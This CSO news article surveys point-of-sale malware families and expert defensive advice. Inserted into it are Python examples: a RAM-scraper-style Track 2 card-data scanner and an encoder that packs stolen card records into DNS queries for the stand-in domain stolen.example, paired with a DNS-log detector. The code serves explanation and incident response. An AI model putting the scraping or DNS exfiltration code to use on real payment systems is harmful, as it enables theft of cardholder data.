A wide range of choices for consumers is one of the things that make the American economy vibrant.

Unfortunately, a wide range of choices also exists in the world of cybercrime, where developers of malware focused on point-of-sale (POS) systems have created dozens of ways to steal payment card information from those same consumers.

Thanks to the catastrophic breach of retailer Target at this time last year, it is now widely known that the current – although now outgoing – payment card system is easily exploitable.

While a magnetic-stripe card is being processed, the track data read from the stripe sits in the POS application’s memory in plaintext before it is encrypted for transmission to the payment processor. That window may last only milliseconds, but POS malware that scans process memory (a “RAM scraper”) can copy the track data during it, and the criminals then collect the stolen records.
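The mechanism, as an added example that is not from the original article: a scanner that searches a memory buffer for magnetic-stripe Track 2 records the way a RAM scraper (or a forensic examiner hunting for one) would. The buffer, the process strings and the card numbers are constructed test data; 4111111111111111 and 5555555555554444 are well-known Luhn-valid test PANs, not real accounts.

```python
"""Added example, not from the original article: find Track 2 magnetic-stripe
records in a block of process memory. The memory contents below are
constructed test data."""
import re

# Track 2 as written on the stripe: ;PAN=YYMM<service code><discretionary>?
# PAN is 13-19 digits, '=' separates it from the expiry (YYMM) and service code.
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")


def luhn_ok(pan: str) -> bool:
    """Return True if the digit string passes the Luhn mod-10 check."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scrape_tracks(buf: bytes) -> list[dict]:
    """Return Track 2 records found in buf whose PAN passes Luhn.
    The Luhn filter is what separates card data from random digit runs
    that happen to have the same shape."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if not luhn_ok(pan):
            continue
        hits.append({
            "pan": pan,
            "expiry": m.group(2).decode(),        # YYMM
            "service_code": m.group(3).decode(),
            "offset": m.start(),                  # where in memory it sat
        })
    return hits


def mask(pan: str) -> str:
    """PCI-style display masking: first six and last four digits only."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed fake process memory: application strings, a valid track,
# a Luhn-invalid decoy with the same shape, and a second valid track.
FAKE_MEMORY = (
    b"\x00\x00POSApp v2.1\x00receipt total 19.99\x00"
    b";4111111111111111=17061011234567890?"              # Luhn-valid test PAN
    b"\x00\x00garbage;1234567890123456=1706101?more\x00"  # fails Luhn, skipped
    b"\x00\x00;5555555555554444=18121019876543210?\x00"   # Luhn-valid test PAN
)

if __name__ == "__main__":
    for h in scrape_tracks(FAKE_MEMORY):
        print(f"offset {h['offset']:5d}: {mask(h['pan'])} "
              f"exp {h['expiry']} svc {h['service_code']}")
```

The same regular expression plus Luhn check, run over a memory image of the payment process rather than a constructed buffer, is a quick way for an incident responder to confirm that cardholder data was actually exposed in plaintext on a suspect terminal.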

The U.S. is moving to payment systems with better security. By October 2015, the 1960s-vintage “swipe-and-signature” card system is expected to be largely replaced, either by the EMV smart-card system (Chip-and-PIN) or by an even newer system based on near-field-communication (NFC) technology, favored by tech giants such as Apple and Google.

But that still leaves plenty of time, including the current holiday season (when POS terminals get their biggest workout of the year), for thieves to raid retailers and other credit card processors.

The problem for the defenders of credit card systems is not just the variety of POS malware families, but that they can evolve so quickly. Kevin McAleavey, a malware expert and cofounder of the KNOS Project, said most security technology still depends in large measure on identifying “signatures” of malicious software.

But antivirus software’s recognition of new signatures generally “trails by hours, days and even longer each new variant of malware,” he said.

“This is one of the major reasons why a command and control network is part of commercial malware. It gives the controllers the ability to update and replace their malware as soon as it is detected by antivirus software, with improved, and once again undetectable, replacements,” he said.

McAleavey said “intrusion detection” systems provide some added benefit, but they also depend on matching the signatures of known malware at the perimeter of an organization’s network.

“Given that POS malware in particular is a well-funded criminal enterprise, the bad guys have the ability to keep ahead of those detection signatures as well,” he said.

POS malware families

Security vendor Trustwave compiled a list of 10 popular POS malware families that the firm says retailers “should keep on their radar,” but other experts, including McAleavey, recommend additions to the list.

The Trustwave list includes:

Backoff – Since its discovery a little more than a year ago, there have been more than 12 variants discovered in the wild. The newest versions send back the stolen data using SSL, the same protocol that protects consumers’ information when they are shopping online. This gives criminals a chance to hide the transmission from security products.

FrameworkPOS – There have been at least six variants of this family during the past couple of years. One clever version co-opts DNS, the protocol used to translate domain names into IP addresses: it encodes the stolen payment card data and the victim’s IP address into lookups for a domain the attackers control, so the exfiltration passes as ordinary name resolution on a network that may block little else.

BlackPOS – Also known as “Kaptoxa,” it has a component that allows it to copy payment cards it has collected to another computer via local network shares where they are consolidated before being sent out of the victim’s network.

JackPOS – This had a number of internal programming bugs that somewhat limited its ultimate effectiveness. It exfiltrates payment card data by sending it to attackers over HTTP with what is known as a POST request – a basic way to send data to a web server.

Chewbacca – Also known as Fysna, it is not nearly as widespread as some other POS malware families, but does have a unique capability. It uses the Tor anonymity network to hide its communications.

vSkimmer – Thought by some to be a descendant of the Dexter malware family, this is an early example of POS malware that operates as a botnet. In addition to stealing payment card information, it can receive commands from a server controlled by the attackers.

Dexter – The most recent of three major variants uploaded its payment cards to an FTP server. This is an uncommon technique for malware, since the username and password for the server are usually embedded in the malware itself; once recovered from a sample, they let investigators reach the drop server and trace the criminals.

Alina – More than 13 variants were discovered in the wild this past year. Each new release of the malware includes incremental improvements and tweaks to the code helping the attackers block detection by security defenses.

ProjectHook – Discovered in 2012, but references to its code base are still being used in new malware families. It has a unique ability to update the list of command-and-control servers with which it communicates.

AutoIt-based – The least technically advanced example. It leverages AutoIt, a legitimate IT administration scripting language, and uses that simplified scripting code to gather the payment card data instead of a compiled lower-level language that requires a more formal understanding of programming.

***

Other experts have offered several additions to that list.

Getmypass – PC World reported last month that Nick Hoffman, a reverse engineer, said Getmypass is like other RAM scrapers, “which collect unencrypted payment card data held in a payment system’s memory.” He said it is still in development, but evaded 55 antivirus scanners on VirusTotal. McAleavey said he was able to track the author through certificate registration to an apartment block in Moscow. Shortly after that, he said, the author moved everything to the Tor “onion” network.

D4re|dev1| – Discovered by threat intelligence firm IntelCrawler, this strain (pronounced “daredevil”) is aimed at ticket vending machines and electronic kiosks. It uses RAM scraping and keylogging features like other POS malware.

@-Brt – This strain, announced by IntelCrawler in July, is an automated network that uses “an underground bot army” of infected computers to “brute force POS systems in an attempt to steal login credentials.”

Even though today’s obsolete payment card system is still in place, experts say there are steps that organizations and individuals can take to make themselves a more difficult target.

Karl Sigler, threat intelligence manager at Trustwave, noted that, “in many of the POS malware attacks this past year, the criminals got in due to weak security practices by third-party providers.”

That, as is widely known, is how the Target breach occurred. And third-party security is expected to improve, since the latest Payment Card Industry Data Security Standard, PCI DSS 3.0, includes more stringent requirements for third-party providers starting Jan. 1.

“However, businesses should do more,” Sigler said. “Their contracts with third-party providers should include clauses regarding data protection. They should also have their own layered security strategy in place so even if a criminal compromises a third-party provider’s password, he can still be stopped from gaining access to the business’s entire infrastructure.”

Other recommendations for organizations include:

“Allow only whitelisted applications on POS devices,” said Timo Hirvonen, senior researcher, Security Response, at F-Secure. “There should be a default-deny policy for all connections to and from the POS device.”

McAleavey recommends joining with other organizations in “indicators of compromise” sharing solutions, “as proposed by the OpenIOC Framework created by Mandiant” – a security firm acquired a year ago by FireEye.

“Network and host-based monitoring for indicators of compromise, data exfiltration and malware communication plays a critical role,” said Mario de Boer, research director, Security and Risk Management Strategies at Gartner for Technical Professionals.

Use a POS system only for that purpose, not as a general workstation. “Organizations should segment their critical data – customers’ payment card data – from their non-critical data,” Sigler said.

Organize cyber intelligence and threat monitoring frameworks across the enterprise. “Traditionally these infrastructures are franchised-based and decentralized,” said Andrew Komarov, CEO of IntelCrawler. “That creates serious flaws in security.”

Have skilled security staff in place. “Security technologies such as intrusion detection and prevention, network access control, anti-malware technologies and others, are only as good as the people who manage them,” Sigler said.
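The DNS-based exfiltration attributed to FrameworkPOS above, and the host- and network-based monitoring de Boer recommends, as one added example that is not from the original article: the attacker side builds DNS query names carrying a stolen track, and the defender side parses a resolver log and flags a client that sends an unusual volume of unique subdomain bytes to one domain. The base32 chunking scheme, the domain stolen.example and the log lines are constructed for illustration; they are not FrameworkPOS’s actual format or infrastructure.

```python
"""Added example, not from the original article: DNS-tunnelled card
exfiltration and a volumetric detector for it. Encoding, domain and log
lines are constructed for illustration."""
import base64
import re

# ---- attacker side (hypothetical encoding, for illustration only) ----
def encode_exfil_queries(record: bytes, domain: str, chunk: int = 30) -> list[str]:
    """Base32-encode a stolen record (base32 output is a valid hostname
    alphabet), split it into labels shorter than DNS's 63-byte limit, and
    return one query name per chunk: '<seq>.<chunk>.<domain>'."""
    b32 = base64.b32encode(record).decode().rstrip("=").lower()
    chunks = [b32[i:i + chunk] for i in range(0, len(b32), chunk)]
    return [f"{i}.{c}.{domain}" for i, c in enumerate(chunks)]


def decode_exfil_queries(names: list[str], domain: str) -> bytes:
    """Reassemble the record from the query names; this is also what an
    investigator does to prove the DNS log itself now holds card data."""
    pairs = sorted((int(n.split(".")[0]), n.split(".")[1])
                   for n in names if n.endswith("." + domain))
    b32 = "".join(c for _, c in pairs).upper()
    b32 += "=" * (-len(b32) % 8)          # restore base32 padding
    return base64.b32decode(b32)


# ---- defender side ----
# Constructed BIND-style query log format: "<ts> <client> query: <name> IN <type>"
LOG_RE = re.compile(r"^(\S+) (\S+) query: (\S+) IN (\w+)")


def parse_dns_log(lines):
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield {"ts": m.group(1), "client": m.group(2),
                   "qname": m.group(3).rstrip("."), "qtype": m.group(4)}


def detect_exfil(lines, min_bytes: int = 64) -> dict:
    """Sum the bytes of *unique* subdomains each client sends to each
    registrable domain. Legitimate lookups reuse a handful of short names;
    a tunnel must keep inventing long new ones to carry data. Returns
    {(client, domain): unique_subdomain_bytes} for pairs over min_bytes."""
    seen: dict[tuple, set] = {}
    for q in parse_dns_log(lines):
        parts = q["qname"].split(".")
        if len(parts) < 3:
            continue
        domain = ".".join(parts[-2:])          # two-label approximation
        seen.setdefault((q["client"], domain), set()).add(".".join(parts[:-2]))
    totals = {k: sum(len(s) for s in subs) for k, subs in seen.items()}
    return {k: n for k, n in totals.items() if n >= min_bytes}


# Constructed sample: one stolen Track 2 record (test PAN) plus victim IP,
# mixed into otherwise ordinary lookups from two POS hosts.
TRACK = b";4111111111111111=17061011234567890?|10.0.0.5"
EXFIL_NAMES = encode_exfil_queries(TRACK, "stolen.example")
SAMPLE_LOG = [
    "2014-12-15T10:01:02 10.0.0.5 query: www.example.com IN A",
    "2014-12-15T10:01:03 10.0.0.5 query: time.windows.com IN A",
    "2014-12-15T10:01:04 10.0.0.7 query: updates.posvendor.example IN A",
] + [f"2014-12-15T10:01:0{5 + i} 10.0.0.5 query: {n} IN A"
     for i, n in enumerate(EXFIL_NAMES)]

if __name__ == "__main__":
    for (client, domain), n in detect_exfil(SAMPLE_LOG).items():
        print(f"{client} sent {n} bytes of unique subdomains to {domain}")
```

The threshold has to be tuned against a baseline of the site’s own traffic, because CDNs and some telemetry services also generate long hashed hostnames; the stronger signal on a POS segment is that a terminal should resolve almost nothing at all, which is why the default-deny policy Hirvonen describes makes this kind of monitoring far easier.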

Experts also caution that while the transition of the payment card system to EMV or NFC will improve security significantly, it will not eliminate credit card fraud.

EMV, while it improves security at the POS terminal, still leaves the user vulnerable in “card-not-present” transactions such as online purchases.

NFC holds the possibility of being even more secure. With Apple Pay, the merchant never sees the credit card number, and the data is encrypted from the phone to the participating bank.

Still, as Paganini notes, “Any new technology has new risks. Security professionals have identified vulnerabilities and bugs in various versions of NFC technology, as well as Apple Pay as a product.”

According to McAleavey, the best thing individual consumers can do is to sign up for two-factor authentication. “It won't prevent their credit card numbers from getting lifted by malware,” he said, “but with two-factor, where a secret code is transmitted to your phone or a special key fob to confirm the sale, that's a one-time use code. Once you've confirmed at the POS that it really is you, the approval goes through. If someone else tries to use the card, then they cannot provide the countersignature.”

This story, "Top malware families turn point-of-sale into point-of-theft" was originally published by CSO.